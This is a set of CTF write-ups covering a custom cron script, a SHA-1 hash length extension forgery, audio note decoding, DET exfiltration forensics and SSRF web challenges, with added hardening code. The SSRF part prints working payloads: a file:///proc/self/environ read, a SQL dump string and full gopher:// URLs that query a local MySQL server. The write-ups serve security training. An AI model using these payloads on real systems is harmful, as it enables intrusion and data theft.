description: Why not roll your own version of cron?
category: Linux - 300
According to the description, the server is running its own version of cron.
I started by listing the running processes:
This is the content of the /usr/bin/fakecron file:
#!/bin/bash
# Cron. But worse.
#
# Copyright (c) 2019, SuckMore Software, a division of WPI Digital Holdings Ltd.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. All advertising materials mentioning features or use of this software
# must display the following acknowledgement:
# This product includes software developed by SuckMore Software, a division
# of WPI Digital Holdings Ltd.
# 4. Neither the name of the SuckMore Software, a division of WPI Digital Holdings
# Ltd, nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY SuckMore Software, a division of
# WPI Digital Holdings Ltd., ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# SuckMore Software, a division of WPI Digital Holdings Ltd.
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
file="/etc/deadline"
cron(){
  second=0
  minute=0
  hour=0
  day=1;month=1;year=2019
  while true;do
    sleep 1
    # /etc/deadline holds six space-separated fields: year month day hour minute second
    target_second=`cut -d" " -f 6 $file`
    target_minute=`cut -d" " -f 5 $file`
    target_hour=`cut -d" " -f 4 $file`
    target_day=`cut -d" " -f 3 $file`
    target_month=`cut -d" " -f 2 $file`
    target_year=`cut -d" " -f 1 $file`
    # only the first matching branch runs, so minute 59 lasts a single iteration and day never changes
    if [[ "$second" -eq 59 ]];then
      minute=$((minute+1));second=0
    elif [[ "$minute" -eq 59 ]];then
      hour=$((hour+1));second=0;minute=0
    else
      second=$((second+1))
    fi
    # the fourth and sixth tests compare hour with target_second and second with target_hour
    if [[ "$year" -eq "$target_year" ]]\
    && [[ "$month" -eq "$target_month" ]]\
    && [[ "$day" -eq "$target_day" ]]\
    && [[ "$hour" -eq "$target_second" ]]\
    && [[ "$minute" -eq "$target_minute" ]]\
    && [[ "$second" -eq "$target_hour" ]];then # echo "WPI{}" > /home/ctf/flag.txt
      exec_flag   # not defined in this excerpt of the script
    fi
    rm /etc/faketimerc
    echo "$year-$month-$day $hour:$minute:$second" > /etc/faketimerc
  done
}
cron &
The script keeps its own clock (written every second to /etc/faketimerc) and compares it to the content of /etc/deadline.
There is just one thing to note!!
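As an added illustration (not code from the challenge or the write-up), a small Python model of the script: it parses /etc/deadline and /etc/faketimerc, advances the fake clock exactly as the loop does, and reproduces the comparison chain as written beside the field-by-field comparison one would expect.

```python
import re

# Field order in /etc/deadline, as read by fakecron's cut -f 1..6.
FIELDS = ("year", "month", "day", "hour", "minute", "second")


def parse_deadline(line):
    """Split one /etc/deadline line ("Y M D h m s") into the six integer fields."""
    parts = line.split()
    if len(parts) != 6:
        raise ValueError("expected 6 space-separated fields, got %d" % len(parts))
    return dict(zip(FIELDS, map(int, parts)))


def parse_faketimerc(line):
    """Parse the "Y-M-D h:m:s" line fakecron writes to /etc/faketimerc."""
    m = re.fullmatch(r"(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)", line.strip())
    if m is None:
        raise ValueError("unexpected faketimerc format: %r" % line)
    return dict(zip(FIELDS, map(int, m.groups())))


def tick(clock):
    """One loop iteration of fakecron's clock, branch for branch: only the first
    matching branch runs, so minute 59 lasts a single iteration and the day
    never advances. Returns a new dict."""
    c = dict(clock)
    if c["second"] == 59:
        c["minute"] += 1
        c["second"] = 0
    elif c["minute"] == 59:
        c["hour"] += 1
        c["second"] = 0
        c["minute"] = 0
    else:
        c["second"] += 1
    return c


def fakecron_fires(clock, target):
    """The script's comparison chain as written: hour is checked against
    target_second and second against target_hour."""
    return (clock["year"] == target["year"] and clock["month"] == target["month"]
            and clock["day"] == target["day"] and clock["hour"] == target["second"]
            and clock["minute"] == target["minute"] and clock["second"] == target["hour"])


def intended_fires(clock, target):
    """What a field-by-field comparison would do."""
    return all(clock[f] == target[f] for f in FIELDS)
```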
description: Two strange men called me last night. They call themselves the Bogdanoff twins. I don’t know much about cryptocurrency- can you help them with their scheme?
category: Cryptography - 150
Investigations:
First, let's have a look at the leaked_source.py file:
# Python 2 source (raw_input, bare print); only this excerpt was leaked.
import hashlib

secret = ""

def generate_command_token(command, secret):
    # token = SHA-1 over secret || command
    hashed = hashlib.sha1(secret + command).hexdigest()
    return hashed

def validate_input(command, token_in):
    # hash_command is not defined in the leaked excerpt; presumably generate_command_token
    token = hash_command(command, secret)
    if token == token_in:
        return True
    else:
        return False

while (True):
    print("Command:")
    command = raw_input(">>>")
    print('Auth token:')
    token = raw_input(">>>")
    print
    if validate_input(command, token) == False:
        print("Error: Auth token does not match provided command..")
    else:
        execute_command(command)  # also not part of the leaked excerpt
    print
Well, we do not have the whole code but we can easily guess what we have to do.
When you see SOME_HASHING_FUNC(secret+command),
it is the classic setup for a hash length extension attack, and you can find some good information about it here.
The attack consists in appending a payload to a message whose hash you already know, so that you can compute a valid hash for the extended message without knowing the secret (only its length). It would not work if the construction were SOME_HASHING_FUNC(command+secret).
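As an added example (not code from the challenge or the write-up), the leaked token scheme next to the form that defeats the attack: HMAC instead of a bare hash over secret+command, a constant-time comparison, and a syntactic check of each ';'-separated sub-command. SECRET and the command grammar are my assumptions.

```python
import hashlib
import hmac
import re

SECRET = b"constructed-example-secret"  # placeholder; the real service keeps this private

# The help text allows only these two commands, each with one account name.
COMMAND_RE = re.compile(r"^(withdraw|deposit) [A-Za-z0-9_.]+$")


def vulnerable_token(command, secret=SECRET):
    """The leaked scheme: sha1(secret || command). SHA-1's digest is its internal
    state after the last block, so whoever holds this token can continue hashing
    from that state and obtain a valid token for command + padding + suffix
    without the secret (the length extension weakness discussed above)."""
    return hashlib.sha1(secret + command.encode()).hexdigest()


def hardened_token(command, secret=SECRET):
    """HMAC-SHA1: the digest is a second, keyed hash over the inner hash, so it
    is not a state that can be extended."""
    return hmac.new(secret, command.encode(), hashlib.sha1).hexdigest()


def validate_input(command, token_in, secret=SECRET):
    """Reject anything that is not a chain of well-formed sub-commands (which also
    refuses the padding bytes a forged extension carries), then compare tokens in
    constant time so timing does not leak how many characters matched."""
    if not command:
        return False
    for sub in command.split(";"):
        if sub and not COMMAND_RE.match(sub):
            return False
    if not (isinstance(token_in, str) and token_in.isascii()):
        return False
    return hmac.compare_digest(hardened_token(command, secret), token_in)
```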
Let's now connect to the service with nc; we obtain this output:
$ nc bogged.wpictf.xyz 31337
BOGDANOFF:
Bonjour...
We have access to the Binance backdoor, and got you into a compromised teller station.
We need you to steal tethered cryptocurrency from people's wallets.
We were halted by an unfortunate countermeasure in the teller system, but we have an account ready to recieve the stolen crypto.
Steal the currency from cryptowojak123. Transfer it to not_b0gdan0ff.
Transfer everything... then we will kill him, and find another.
Do not fail us.
Welcome to the Binance Teller Terminal!
Please remember to use admin-issued auth tokens with each account transfer!
Either enter a command or one of the following keywords:
accounts: List of accounts currently on the system.
history: A history of prior terminal commands.
help: A reminder on how to use this terminal.
Command:
>>>help
You may either withdraw funds from an account or deposit funds to an account.
Withdraw with the following command:
withdraw ACCOUNT_NAME
Deposit with the following command:
deposit ACCOUNT_NAME
Commands may be chained, as follows:
withdraw ACCOUNT_NAME;deposit ACCOUNT_NAME;...
An authorization token unique to the command contents must exist for the transaction to succeed!
(Sorry, but we have to protect from malicious employees.)
Contact admin@dontactuallyemailthis.net to get auth tokens for different transfer commands!
Command:
>>>history
///// TRANSACTION HISTORY //////////////////////////
Command:
>>>withdraw john.doe
Auth token:
>>>b4c967e157fad98060ebbf24135bfdb5a73f14dc
Action successful!
Command:
>>>withdraw john.doe;deposit xXwaltonchaingangXx
Auth token:
>>>455705a6756fb014a4cba2aa0652779008e36878
Action successful!
Command:
>>>withdraw cryptowojak123;deposit xXwaltonchaingangXx
Auth token:
>>>e429ffbfe7cabd62bda3589576d8717aaf3f663f
Action successful!
Command:
>>>withdraw john.doe
Auth token:
>>>b4c967e157fad98060ebbf24135bfdb5a73f14dc
Action successful!
////////////////////////////////////////////////////
Command:
>>>
So we have some transaction history, and we want to transfer money from cryptowojak123 to not_b0gdan0ff.
One transaction in the history stands out and will be useful later:
To inject a payload, we first need to know the secret length (I'll inject only a ';' for the moment):
Great, our command is unreadable but the injection worked! Now let's send something other than ';', for example ';withdraw xXwaltonchaingangXx;deposit not_b0gdan0ff;':
YEAH! The flag is: WPI{duMp_33t_aNd_g@rn33sh_H1$_wAg3$}
The challenge provided a link to a web page containing an audio file: theMusical.mp3
Opened with Audacity, we get the following:
When we listen to the sound, we can recognize piano notes.
If you have perfect pitch, you can easily recognize the notes you are hearing.
If not, you can use any tuner app on your smartphone, just like everyone…
At the end you should get the following notes:
We notice that, in most cases, every third note is an "E".
The total number of notes is 63 and 63 / 3 = 21, so we can assume that we have 21 groups of 3 notes.
Now let's try to assign values to them…
The lowest note in terms of frequency is D4, so let's consider it our "base" and assign it the value 0.
In this way, we can increment the value for each following note and obtain:
Given the previous picture, we can convert our notes to values and then recognize the octal values of ASCII characters:
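An added decoder (not part of the original write-up) for the scheme described above. The note-to-value mapping is my assumption, since the picture is not reproduced: D4 = 0 and each following note of the scale adds one, giving the eight octal digits; it is consistent with the observation that every third note is an E, because the octal codes of lowercase ASCII letters (0o141 to 0o172) all begin with 1. It also works in the other direction, to check a guessed mapping against the recording.

```python
# Assumed mapping (the write-up's picture is not reproduced here): the lowest
# note D4 is 0 and each following note of the scale adds one, which gives
# exactly the eight octal digits 0..7.
NOTE_VALUES = {"D4": 0, "E4": 1, "F4": 2, "G4": 3, "A4": 4, "B4": 5, "C5": 6, "D5": 7}
VALUE_NOTES = {v: k for k, v in NOTE_VALUES.items()}


def notes_to_digits(notes):
    """Map each note name to its octal digit, refusing notes outside the scale."""
    digits = []
    for n in notes:
        if n not in NOTE_VALUES:
            raise ValueError("note %r is outside the D4..D5 range" % n)
        digits.append(NOTE_VALUES[n])
    return digits


def notes_to_text(notes):
    """Group the notes by three, read each group as a three-digit octal number
    and return the ASCII text (63 notes in the challenge give 21 characters)."""
    if len(notes) % 3:
        raise ValueError("%d notes is not a multiple of 3" % len(notes))
    digits = notes_to_digits(notes)
    chars = []
    for i in range(0, len(digits), 3):
        code = digits[i] * 64 + digits[i + 1] * 8 + digits[i + 2]
        if code > 127:
            raise ValueError("group %d is not an ASCII code point" % (i // 3))
        chars.append(chr(code))
    return "".join(chars)


def text_to_notes(text):
    """Inverse direction: the note sequence that encodes an ASCII string."""
    notes = []
    for ch in text:
        code = ord(ch)
        for d in ((code >> 6) & 7, (code >> 3) & 7, code & 7):
            notes.append(VALUE_NOTES[d])
    return notes
```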
description: Hey, psst, kid, I heard you in the bar. You're looking for M0th3r? oO Don't make that face, you really need to learn to be more discreet. I listen to everything that goes on at Cyber Build. By the way, here is the capture of one of his latest operations. It's worth GOLD.
category: Forensic
The challenge provided a network traffic capture file: caper.pcapng.
When we analyse the first TCP session, we can see the following HTTP request: GET /config.json
The content of the JSON file is shown in the screenshot below:
This file is a configuration file used by the tool DET ((extensible) Data Exfiltration Toolkit).
This tool gives the ability to exfiltrate files from a network by using multiple protocols and techniques.
The file to exfiltrate is encrypted before being cut into pieces, which are then sent base64 encoded to the exfiltration server.
In our case 2 protocols were used for exfiltration: ICMP and HTTP.
The key used for AES encryption is "S3cur1tyD4y".
Extract data from ICMP:
For this channel, the data is inserted into the Data field of the ICMP requests.
We can use Tshark to gather the raw data inserted in the ICMP requests:
tshark -r caper.pcapng -Y "icmp.type==0" -T fields -e data
After converting the bytes into ASCII characters, we can decode the base64 and get some parts of the transaction:
We can see that we get the registration of the file with its filename and its hash, part 1 and part 2 of the data and the final message ending the transaction.
We still miss part 0 and part 3 of the data in order to recover the original file.
Extract data from HTTP:
For this channel, the data is sent over POST requests (application/x-www-form-urlencoded).
Again, we use Tshark to extract the data from the PCAP:
We first need to put the different parts of the transaction back in the right order.
We can then remove the first and last parts: I5LS9MX|!|flag.txt|!|REGISTER|!|3ec59ac658986a43921d824ae06ea494 and I5LS9MX|!|4|!|DONE.
We also remove the prefix I5LS9MX|!|<id>|!| to keep only the AES encrypted data.
We can then write a script based on the source code of DET to decrypt the message:
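An added reassembly script (mine, not the write-up's DET-based script): it decodes packets from either channel, orders the parts of one transaction, checks against the DONE count that nothing is missing, and hands the remaining base64 blob to an AES routine written from my reading of DET's aes_encrypt(), which is an assumption (AES-CBC, key = SHA-256 of the passphrase, IV prepended, PKCS#7 padding). The job id, filename and hash used in the test are the ones shown above.

```python
import base64
import hashlib

SEP = "|!|"  # field separator seen in the messages above

def encode_packet(job_id, field, payload):
    """Sender side, used here to construct test data: jobid|!|field|!|payload, base64 encoded."""
    return base64.b64encode(SEP.join((job_id, field, payload)).encode()).decode()

def parse_packet(raw_b64):
    """Decode one packet (ICMP data field or HTTP POST body) into its three fields."""
    job_id, field, payload = base64.b64decode(raw_b64).decode().split(SEP, 2)
    return job_id, field, payload

def reassemble(packets, job_id):
    """Merge the packets of one transaction from any channel, in any order, and
    return (filename, md5_hex, ciphertext_b64); raise if parts are missing."""
    filename = expected_md5 = done_count = None
    parts = {}
    for raw in packets:
        job, field, payload = parse_packet(raw)
        if job != job_id:
            continue  # belongs to another transaction
        if payload.startswith("REGISTER" + SEP):
            filename, expected_md5 = field, payload.split(SEP)[1]
        elif payload == "DONE":
            done_count = int(field)  # number of data parts the sender emitted
        else:
            parts[int(field)] = payload
    if done_count is None:
        raise ValueError("no DONE packet for job %s" % job_id)
    missing = sorted(set(range(done_count)) - set(parts))
    if missing:
        raise ValueError("job %s is missing parts %s" % (job_id, missing))
    return filename, expected_md5, "".join(parts[i] for i in range(done_count))

def decrypt_det(ciphertext_b64, passphrase):
    """Decrypt the reassembled blob the way I read DET's aes_encrypt() (assumption):
    AES-CBC keyed with SHA-256(passphrase), 16-byte IV prepended, PKCS#7 padding.
    pycryptodome is imported lazily so reassembly works without it."""
    from Crypto.Cipher import AES
    blob = base64.b64decode(ciphertext_b64)
    key = hashlib.sha256(passphrase.encode()).digest()
    plain = AES.new(key, AES.MODE_CBC, blob[:16]).decrypt(blob[16:])
    return plain[:-plain[-1]]  # strip PKCS#7 padding
```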
description: M0th3r > Hey, what? You were expecting the great legendary M0th3r? Sorry to disappoint you. I hear you want to serve the cause? You found me, but it's not won yet. It's not certain I'll take you under my wing. Here, practice, and maybe we'll see whether you have what it takes to be a Cyber Pirate.
category: Web
The first web challenge, Eckmühl Down, was a simple SSRF: the application fetched the given URL and exported the content as a PDF file, and you had to make it request the service listening on port 22. With it we get the flag ESGI{Duke-083-B4seLine-J.D.456}.
The next challenge, Rookie (ctf.hacklab-esgi.org:8082), was also an SSRF. Once again we can scan ports through it, and we see that port 3306 (MySQL) is open; a direct nmap scan shows it as filtered.
<h1>Website checker</h1>
<p>Nous utilisons une nouvelle technologie parfaitement sûre pour tester vos divers sites internet. N'hésitez pas à nous donner du Dodgecoin!</p>
<form action="index.php" method="post">
URL Checker :
<input type="text" name='url'/>
</form>
Let's extract the source code of the challenge in order to get more context. First we extract the current working directory from /proc/self/environ with the payload file:///proc/self/environ.
Now we know the web application is located at /var/www/html/; with the same trick we can request the content of index.php.
<?php include_once "config_test.php"; ?>
There is a mention of a config_test.php file, which contains the following line: // TODO: MySQL connection with "tiix" user and adding a MySQL password....
Now we know the user tiix and that it has no password; based on that we can craft a payload to interact with the MySQL database, using Gopherus and the DumpInOneShot payload from PayloadsAllTheThings.
Dump in one shot payload: (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#.
The Gopher protocol allows us to send arbitrary content to a service.
The challenge has a table nothinghere and users. First we can extract users from the database : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%20%00%00%00%03%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%2e%75%73%65%72%73%01%00%00%00%01.
Some nice passwords; now let's get the flag from securityday.nothinghere.
python2 gopherus.py --exploit mysql
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: tiix
Give query to execute: select flag from securityday.nothinghere;
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2a%00%00%00%03%73%65%6c%65%63%74%20%66%6c%61%67%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%2e%6e%6f%74%68%69%6e%67%68%65%72%65%3b%01%00%00%00%01
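As an added example (not the challenge's code), the check the URL checker was missing, written in Python rather than PHP: only http/https, no userinfo, and every address the host resolves to must be a global unicast address, which rules out file://, gopher://127.0.0.1:3306 and every other path to localhost used above. The resolver argument is there so the check can be tested offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Every address the name maps to; a hostile name may map to several."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_url(url, resolver=default_resolver):
    """Return (ok, reason). Only http/https, no userinfo, and every resolved
    address must be global unicast: loopback, private, link-local and reserved
    ranges (and IPv4-mapped IPv6 forms of them) are refused."""
    try:
        parts = urlsplit(url)
    except ValueError as e:
        return False, "unparsable URL: %s" % e
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    try:
        addrs = resolver(parts.hostname)
    except OSError as e:  # socket.gaierror is a subclass
        return False, "cannot resolve host: %s" % e
    if not addrs:
        return False, "host does not resolve"
    for a in addrs:
        ip = ipaddress.ip_address(a)
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if not ip.is_global:
            return False, "host resolves to non-global address %s" % ip
    return True, "ok"
```

The fetch that follows must connect to an address that passed this check rather than resolving the name again, otherwise a DNS answer that changes between the check and the request (rebinding) bypasses it.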